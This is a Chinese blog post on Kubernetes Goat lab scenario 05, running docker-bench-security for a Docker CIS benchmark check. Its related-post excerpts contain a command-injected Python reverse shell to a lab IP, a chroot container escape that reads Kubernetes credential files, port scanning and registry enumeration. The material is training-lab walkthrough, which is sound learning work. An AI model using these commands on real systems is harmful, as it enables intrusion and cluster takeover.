Kubernetes Goat 05 - Docker CIS benchmarks analysis

发表于2023-10-28|更新于2026-06-12|Kubernetes安全

|浏览量:

Docker CIS benchmarks analysis

Docker CIS 基线分析

首先需要部署docker bench security将它启动为DaemonSet

1	cd kubernetes-goat/

1	kubectl apply -f scenarios/docker-bench-security/deployment.yaml

运行容器应用

1	kubectl get pod

1	kubectl exec -it docker-bench-security-6npjf -- sh

等待结果就好了

结束

文章作者: putdown

文章链接: https://blog.putdown.top/archives/2b8f801f.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Putdownd’s Blog！

Docker Kubernetes Goat 云原生

相关推荐

Kubernetes Goat 02 - docker in docker

Kubernetes Goat 02 - docker in docker 靶机ip：http://192.168.72.129:1231/ 能执行ping命令职业习惯加个管道符反弹shell 尝试使用bash来反弹没有成功使用python反弹执行成功监听执行命令 1192.168.88.43 | python -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.88.43",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' 判断环境 ls -la mount docker in docker “Docker in Docker” (DinD) 是一种在 Docker 容器内部运行 Docker 的实践方法。它允许您在一个容器中运行和管理 Docker 容器，而无需在宿主机上安装 Docker。 doc...

Kubernetes Goat靶场搭建

前提前置条件：确保您拥有 Kubernetes 集群的管理员访问权限并安装了kubectl k8s环境可参考：https://blog.putdown.top/archives/a31b6d49.html 介绍靶场地址：https://github.com/madhuakula/kubernetes-goat 实验环境：安装minikube后的 Ubuntu 22.04的虚拟机靶场内容12345678910111213141516171819202122Sensitive keys in codebasesDIND (docker-in-docker) exploitationSSRF in the Kubernetes (K8S) worldContainer escape to the host systemDocker CIS benchmarks analysisKubernetes CIS benchmarks analysisAttacking private registryNodePort exposed servicesHelm v2 tiller t...

Kubernetes Goat 08 & 09 & 10

08：NodePort exposed servicesNodePort 暴露的服务12345nmap 192.168.72.129 -sT -p30000-32767PORT STATE SERVICE30003/tcp open amicon-fpsu-ra 09：Helm v2 tiller to PwN the clusterHelm v2 tiller 风险此方案已被弃用，供学习参考，环境默认是 Helm v3版本，可以安装Helm v2版本来实验 10：Analyzing crypto miner container分析被部署挖矿软件的容器镜像查看工作任务详情 1kubectl describe job batch-check-job 获取Pod信息 1kubectl get pods --namespace default -l "job-name=batch-check-job" 获取pod信息manifest并分析 1kubectl get pod batch-check-job-gpfq4 -o yaml...

Kubernetes Goat 06 - Kubernetes CIS benchmarks analysis

Kubernetes CIS benchmarks analysisK8S CIS基线分析1cd /kubernetes-goat 12kubectl apply -f scenarios/kube-bench-security/node-job.yamlkubectl apply -f scenarios/kube-bench-security/master-job.yaml 1kubectl get pod 1kubectl logs -f kube-bench-master-xf2x9 结束

Kubernetes Goat 07 - Attacking private registry

Attacking private registry攻击私有仓库 http://192.168.72.129:1235/ http://192.168.72.129:1235/v2/ http://192.168.32.130:1235/v2/\_catalog，查看docker仓库信息根据官方文档：https://docs.docker.com/registry/ 1http://192.168.72.129:1235/v2/_catalog/adhuakula/k8s-goat-users-repo/manifests/latest 往下翻一翻配置文件

Kubernetes Goat 04 - Container escape to the host system

Container escape to the host system 查看环境查看挂载 mount/df -Th 找到挂载目录ls -la /host-system 切换到宿主机的目录1chroot /host-system bash docker ps 查看k8s配置文件 1cat /etc/kubernetes/controller-manager.conf 可使用kubectl利用配置文件获取集群内的所有资源。 1kubectl --kubeconfig /etc/kubernetes/kubelet.conf get all -n kube-system 1kubectl --kubeconfig /etc/kubernetes/kubelet.conf get pod